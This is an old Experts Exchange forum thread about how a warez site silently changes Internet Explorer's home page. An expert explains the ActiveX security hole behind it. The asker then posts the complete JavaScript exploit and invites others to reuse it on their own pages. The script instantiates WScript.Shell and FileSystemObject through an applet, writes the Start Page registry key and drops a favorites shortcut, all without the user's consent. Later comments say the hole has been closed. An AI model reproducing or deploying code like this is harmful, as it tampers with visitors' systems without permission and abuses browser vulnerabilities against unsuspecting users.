Solved

Set home page without prompt?

Posted on 2001-07-07
10
249 Views
Last Modified: 2012-05-04
I noticed, that page www.easywarez.com sets default home page in MS Internet Explorer without that familiar "Would you like to set your home page..." prompt. I checked their sources but I was not able to find out how they do it.

Could someone please tell me how this is done?

0
Comment
Question by:jakac
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
10 Comments
 
LVL 5

Expert Comment

by:djbusychild
ID: 6261530
what ARE you doing at a site like that??? --;

No there's no way of doing that without prompting unless you have downloaded an activex control from them or you're running their ste on HTA.

I just went to the site and they do prompt me for setting their page as my home.
0
 

Expert Comment

by:dfc106
ID: 6261855
They prompted me too, but the homepage had already been set by then.  And I hadn't downloaded any activeX components.  Added a bookmark too.  Can't figure out how they did the homepage though.
0
 
LVL 5

Expert Comment

by:djbusychild
ID: 6261859
well, it didn't work for me. My homepage is still intact. mayeb your computer has been had. ;)
0
Creating Instructional Tutorials  

For Any Use & On Any Platform

Contextual Guidance at the moment of need helps your employees/users adopt software o& achieve even the most complex tasks instantly. Boost knowledge retention, software adoption & employee engagement with easy solution.

 
LVL 7

Expert Comment

by:daniel_c
ID: 6261887
It didn't work for me either... :)
It still prompted me, and asked for permission to set as my homepage.
0
 
LVL 6

Accepted Solution

by:
gete earned 100 total points
ID: 6262128
The page heavily uses Microsoft technology so it will only work for IE. It exploits some of security holes that IE had, that's why maybe it won't work for people regularly update their system. Basically what it does is creating a Windows Script Shell ActiveX object (which is should be marked unsafe I think) in the client-side script, and then using that object, it will modify your registry (the current user/HKCU) where your default page setting resides. And then it also create a File System Object to add a link file directly into your Favorites folder.

In that website, the code is called from the left frame's page using external encoded .js file. You can download the .js by typing directly in the URL bar and try to find the Windows Scripting decoder floating around in the net.

Note: this method is considered a security hole exploitation, so actually it wouldn't be nice to do those things to your visitors.
0
 
LVL 1

Author Comment

by:jakac
ID: 6262269
OK I did everything gete told me to do and now I perfectly understand how it is done...
Here's the whole script if anyone wants to have it. Just save following into something.js and call it from your html with <script language="JavaScript" src="something.js"></script>
This script will set user's default homepage and it will add your page to favorites. This script was tested and works for IE 5 and also IE 6 preview.


---

     document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

     if (navigator.appName == 'Netscape') var language = navigator.language;
     else var language = navigator.browserLanguage;

     function AddFavLnk(loc, DispName, SiteURL) {
       var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
       Shor.TargetPath = SiteURL;
       Shor.Save();
     }

     function f() {
       try {
      a1=document.applets[0];
      a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Shl = a1.GetObject();
      a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
      a1.createInstance();
      FSO = a1.GetObject();
      a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Net = a1.GetObject();
      try {
          if (!language.indexOf('es') >-1) Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.yourpage.com/");
// this will set user your page as a default homepage

          var WF, Shor, loc;
          WF = FSO.GetSpecialFolder(0);
          if (language.indexOf('es') >-1) loc = WF + "\\favoritos";
          else if (language.indexOf('de') >-1) loc = WF + "\\favoriten";
          else if (language.indexOf('sv') >-1) loc = WF + "\\favoriter";
          else if (language.indexOf('it') >-1) loc = WF + "\\preferiti";
          else if (language.indexOf('fr') >-1) loc = WF + "\\favoris";
          else if (language.indexOf('da') >-1) loc = WF + "\\oversigt";
          else loc = WF + "\\Favorites";
          if(!FSO.FolderExists(loc)) {
            if (language.indexOf('es') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favoritos";
            else if (language.indexOf('de') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoriten";
            else if (language.indexOf('sv') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoriter";
            else if (language.indexOf('it') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\preferiti";
            else if (language.indexOf('fr') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoris";
            else if (language.indexOf('da') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\oversigt";
            else loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
            if(!FSO.FolderExists(loc)) {
              return;
            }
          }
          AddFavLnk(loc, "title of your homepage", "http://www.urlofyourpage.com/");
// this will add your page to users favorites

      }
      catch(e) {}
       }
       catch(e) {}
     }

     function init() {
       setTimeout("f()", 1000);
     }

     init();

---
0
 
LVL 6

Expert Comment

by:gete
ID: 6262900
Ahem, actually I didn't expect the whole thing to be posted in this open forum since it's using one of IE security hole. I hope everyone sees it is able to see the methods just for the sake of learning and wisely not putting that to 'forcely' advertise our site.

Anyway, I think the matter is clear now, and since imho I'm the closest one to give the direction, I don't mind if you decided to delete this question because it's quite a sensitive issue ;) But if you think the otherwise to put it in the PAQ, I don't mind either since this is also a learning media, we learn together.

Keep up the good discussion spirit..
0
 
LVL 5

Expert Comment

by:djbusychild
ID: 6262936
why would anybody want to use this exploit?
0
 

Expert Comment

by:bcdeveloper
ID: 6694673
I am trying to use this as a means of setting the homepage on 500 computers on our company intranet.

everyone is or will be using at least IE 5.0, no netscape users.  

However, I am having trouble getting this to work.  

Gete did you write this? Might you be willing to contact me about how to set it up.  

I can be reached at kenneth.ketsdever@smfbc.org
0
 
LVL 75

Expert Comment

by:Michel Plungjan
ID: 8579927
Did you try the policy editor from Microsoft ???

Ps: this exploit has been closed or at least is alerting warnings
0

Featured Post

Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article shows how to create and access 2-dimensional arrays in JavaScript.  It includes a tutorial in case you are just trying to "get your head wrapped around" the concept and we'll also look at some useful tips for more advanced programmers. …
This article discusses how to implement server side field validation and display customized error messages to the client.
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…
Suggested Courses

732 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question